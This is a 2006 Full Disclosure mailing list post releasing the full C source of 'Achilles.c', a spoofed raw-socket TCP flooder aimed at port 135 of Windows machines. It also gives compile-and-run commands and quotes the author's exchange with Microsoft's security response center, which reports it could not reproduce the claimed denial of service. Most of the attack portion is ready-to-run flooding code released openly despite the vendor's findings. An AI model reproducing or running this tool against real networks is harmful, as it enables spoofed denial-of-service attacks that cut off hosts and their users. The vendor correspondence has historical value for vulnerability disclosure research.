Full Disclosure mailing list archives
Windows XP/2000/SMB server/NT Denial of Service attack
From: "J. Oquendo" <sil () infiltrated net>
Date: Mon, 24 Jul 2006 14:24:45 -0500
According to Microsoft the following tool does nothing to Windows based machines. According to my experience it does. According to the experience of 5 separate administrators it does as well. You be the judge of this. Initially this is/was a tool called bubonic.c which was modified for some IDS testing on a Cisco ASA5520 so the tool is a sort of re-post of sorts. Some of the flags were modified and more ranDUMBness introduced. The attack was done locally and remotely. Locally this is/was my setup @ home: Workstations: Windows XP Professional Pentium Centrino Laptop FreeBSD 6.1 Pentium M Laptop Solaris 10 / Sunfire 280r Networking: Cisco 2624 Cisco 3640 Cisco 2970 3Com Superstack Motorola Surfboard @ 10mb down 3mb up compiled: gcc -o achilles achilles.c (LOCAL ATTACK) ../achilles 10.10.10.4 205.205.205.255 1 1 Remotely it was sent with the same settings and the results were the same. The targets were two boxes, one on a T3 and the other set up for me on a DS3 connection in which I sent the attack from my home to both machines and the results were the same as well. I had to change the address for the attack though and spoof it from one of my websites to avoid RFC1918 filtering. Keep in mind the random() calls which I know offhand will change. Try it once, try it twice. I've gotten it to work for me every given time, two testers stated they'd gotten even odder results. Anyhow, since MS stated they found nothing they won't mind their write up being quoted on this. /* * Achilles.c version2 * Remodified Achilles Windows Attack Tool * compiled on FreeBSD 6.1, SuSE 10 * Solaris 10, NetBSD 3.0, * Proof of Concept tool that disconnects * Windows machines until the program is * stopped. Tested locally and remotely. * * linux:~ # uname -a * Linux linux 2.6.13-15.10-default #1 Fri May 12 16:27:12 UTC 2006 i386 GNU/Linux * * $ uname -a * SunOS unknown 5.10 Generic_118822-25 sun4u sparc SUNW,Sun-Fire- 280R * * -bash2-2.05b$ uname -a * FreeBSD hypnos 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1: Thu May 11 01:34:54 CDT 2006 toor@hypnos:/usr/obj/usr/src/sys/HYPNOS i386 * * (c) 2006 J. Oquendo Genexsys.net::Infiltrated.net */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <strings.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif struct ip_hdr { u_int ip_hl:4, ip_v:4; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; u_char ip_ttl; u_char ip_p; u_short ip_sum; u_long saddr, daddr; }; struct tcp_hdr { u_short th_sport; u_short th_dport; u_long th_seq; u_long th_syn; u_int th_x2:4, th_off:4; u_char th_flags; u_short th_win; u_short th_sum; u_short th_urp; }; struct tcpopt_hdr { u_char type; u_char len; u_short value; }; struct pseudo_hdr { u_long saddr, daddr; u_char mbz, ptcl; u_short tcpl; }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; u_short bgport, bgsize, pps; u_long radd; u_long sradd; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname); fprintf(stderr, "dst:\tDestination Address\n"); fprintf(stderr, "src:\tSource Address\n"); fprintf(stderr, "size:\tSize of packet\n"); fprintf(stderr, "num:\tpackets\n\n"); exit(1); } inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xF0F0); sum += (sum >> 16); answer = ~sum; return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s\n", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { struct timespec ts; int i; memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 100; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0xa0; packet.ip.ip_id = radd; packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = 0; packet.ip.ip_ttl = 255; packet.ip.ip_dst.s_addr = radd; packet.tcp.th_flags = 0; packet.tcp.th_win = 65535; packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = random(); packet.tcp.th_urp = 0; packet.tcp.th_dport = 135; cksum.pseudo.daddr = sradd; cksum.pseudo.mbz = random(); /* WATCH ME CLOSELY */ cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = random(); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = sradd; s_in.sin_port = 135; for(i=0;;++i) { if( !(i&31337) ) { packet.tcp.th_sport = 135; cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd; packet.tcp.th_flags = random(); packet.tcp.th_ack = random(); } else { packet.tcp.th_flags = rand(); packet.tcp.th_ack = rand(); } ++packet.ip.ip_id; /*++packet.tcp.th_sport*/; ++packet.tcp.th_seq; if (!bgport) s_in.sin_port = packet.tcp.th_dport = 135; packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0); } } int main(int argc, char *argv[]) { int on = 1; printf("Achilles.c Windows Attack Tool\n"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 4) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("\nFinding host\n"); fflush(stdout); radd = lookup(argv[1]); bgport = atoi(argv[3]); bgsize = atoi(argv[4]); sradd = lookup(argv[2]); printf("Achilles: Before my time is done I will look down on your corpse and smile.\n"); flooder(); return 0; } From: "J. Oquendo" <joquendo () hushmail com> To: Microsoft Security Response Center <secure () microsoft com> Date: Sat, 08 Jul 2006 22:16:24 -0400 This message is not encrypted, and is not digitally signed by "joquendo () hushmail com" <joquendo () hushmail com> . On Sat, 08 Jul 2006 17:47:05 -0400 Microsoft Security Response Center <secure () microsoft com> wrote:
Hello, I wanted to give you a brief update with regards to our status on your case. While I did see your post on Slashdot including snippets of our earlier correspondence mentioning that you have been able to repro this issue on multiple occasions, we unfortunately have not been successful in our attempts.
Thanks for responding back a second time around. I saw your first email but laughed it off. I debated on whether or not to release it because I know it works. Heck I just finished telling and SHOWING my new coworkers the attack and offered an explanation of it to them. Know something... Still worked for me. I also mentioned to one coworker how you guess tested it with FreeBSD under VMWare and the thought was there could be an issue with VMWare's take on the networking stack...
We also could not identify from the provided TCPDump info any distinct connection attempts to port 135 that would result in a Denial of Service. Our investigation which has included code review, review of the TCPDump, and attempts on reproing the issue on multiple fresh installs of various Windows Operating Systems have all resulted in non confirmation. We have also not been able to identify any of the "odder things" that you mentioned earlier.
Could be one of two things... Firstly the initial program was written to break BGP routing so I issued the destport to 179. Then I wanted to tinker with my IDS at the same time so I set it to random()... Then I set one to MSRPC so you might have gotten the random() of which the coding is still the same. Now to be even more ironic about the whole thing, the version I showed to my coworkers targeted guess what? Random ports and still shut my MS machine down at will.
If you believe there are any additional details or information that would better help illustrate the issue I would gladly use it to further the push the investigation with the engineering teams. Otherwise I will close the case with our current status and findings to date. One question that I have is the target host that is exhibiting the issue a fresh install of the OS?
You guys say you can't find anything on it, then there should be no issues with me releasing it along with mention of you guys finding no reason to be weary of the tool. I'm sure you guys might want to do some further investigation else it would look pretty ridiculous for MS not to be able to find issues while everyone else on say Bugtraq scratches their heads on MS' miscues. Instead of trying to exploit in under FreeBSD under VMWare, try it on a dedicated FreeBSD machine. Heck try it under Linux the code is portable.
My apologies for the delay since our last correspondence, but I have wanted to ensure that we have pursued every avenue before coming back to with this conclusion.
No apologies needed. I kind of shrugged it off a long time ago. You guys say you can't replicate it yet I can whenever I run it. I'm just curious if others would be able to as well. So far I have had about 5 trusted sources test it conclusively. All results were the same. My qualm is that of... Do the script kiddiots need another idiotic DoS toy? Not really, but at the same time I stay shaking my head in disbelief you guys can't find nothing while I can break Windows 2000, 2003SMB, XP at will.
Best regards, Adrian Microsoft Security Response Center
-----Original Message----- From: J. Oquendo [mailto:joquendo () hushmail com] Sent: Tuesday, May 23, 2006 6:22 PM To: Microsoft Security Response Center Subject: RE: Security Vulnerability Report [6588as] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Adrian, here is a link for a two second packet dump from the BSD machine sending out packets. http://xxx.xxx.xxx.xxx:905/ach.dump An attachment would have been too big to send. Unsure what you guys see but here were the flags I used when compiling and sending the attack... gcc -o achilles achilles.c ./achilles 10.1.1.2 192.168.1.2 1 1 The 10.1.1.2 is obviously whatever I want it to be and the 192 is the victim host. Yes it can be sent to a remote machine as well. Provided the remote host is not firewalled, the results are the same. If your concerns are solely a "Denial of Service" via resource flood, you're semi mistaken... While the specified MSRPC port is exhausted, this should not stop your Windows machines from accepting in and outbound connections. Also a Denial of Service (via resource exhaustion) has already been covered by testing this on a colo'd machine where my connection was a fragment of the attacked machine. Meaning... Attacking machine was a DSL based machine with no more than a 2MBPS attacking a T3 colo'd machine 45MBPS and again... The results were the same. Remote host stopped all in and outbound connections until I ceased... There should be another concern that someone there at Microsoft may want to note... If I change the program to accept random settings using SYN or URG flags, and random TCP codes, even odder things happen. Being so many different packets are going through the wire, its difficult to pinpoint which is doing what. ... Anyhow that dump was killed after 2 seconds. A heck of a lot of packets being pushed. On Tue, 23 May 2006 19:23:37 -0400 Microsoft Security Response Center <secure () microsoft com> wrote:Thank you for the update with regards to your findings. We are still going through the repro stages of the case and there appears tobesome confusion over the concern. Do you happen to have a network trace of the behavior that I could work with our development teams inreviewingto ensure that we are looking at the same concern and avoid any possible confusion on the matter? Thanks, Adrian Microsoft Security Response Center -----Original Message----- From: J. Oquendo [mailto:joquendo () hushmail com] Sent: Tuesday, May 23, 2006 1:13 PM To: Microsoft Security Response Center Subject: RE: Security Vulnerability Report [6588as] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Just to inform you, I have also tested this from my home to a remote location that is colocated on a T3 connection and the result was the same. I was able to break connectivity to the machine from a1.5mbDSL connection to a T3. The attack was halted when firewall ruleswerein place. -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkRzbLoACgkQVnroYexO+HLb5QP+Kh/uLH316Hpb3Gvyl1dBlqeGOoBX /3BYWHHau0wINp7dvKKSkq1qLkaGDiXn14yqPIOTvw90mrtBQut5nebCFYRiaakui36t xQ7qv9RRll5vG7QUYGBhWIcLBzvcs+ck0ZhRjv9xJS2QsrdlOztDOpYjZggsAYF8Df2E IbpNHoM= =o8z1 -----END PGP SIGNATURE----- Concerned about your privacy? Instantly send FREE secure email,noaccount required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485-----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkRztVIACgkQVnroYexO+HLGwAQApDSVKJ1E7WbZjg5M90yWIz4oFJP M 1yQKNG0DchZ0bv//OXN3FiaHrh7S4iUO+dlSLLeHvUCIzG3+8oDHswo47miElprnhFL i lCNDVIKXPnBWZgMLI170AGT7htNrgtwUF4tOT24bK90Pe1XqjObqmgOMA1l3ceOmIx/ y oEL/Ovk= =Gs59 -----END PGP SIGNATURE----- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485
perl -e 'print $i=pack(c5,(40*2),sqrt(7600),(unpack(c,Q)-3+1+3+3-7),oct(104),10,oct(101));' _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Windows XP/2000/SMB server/NT Denial of Service attack J. Oquendo (Jul 24)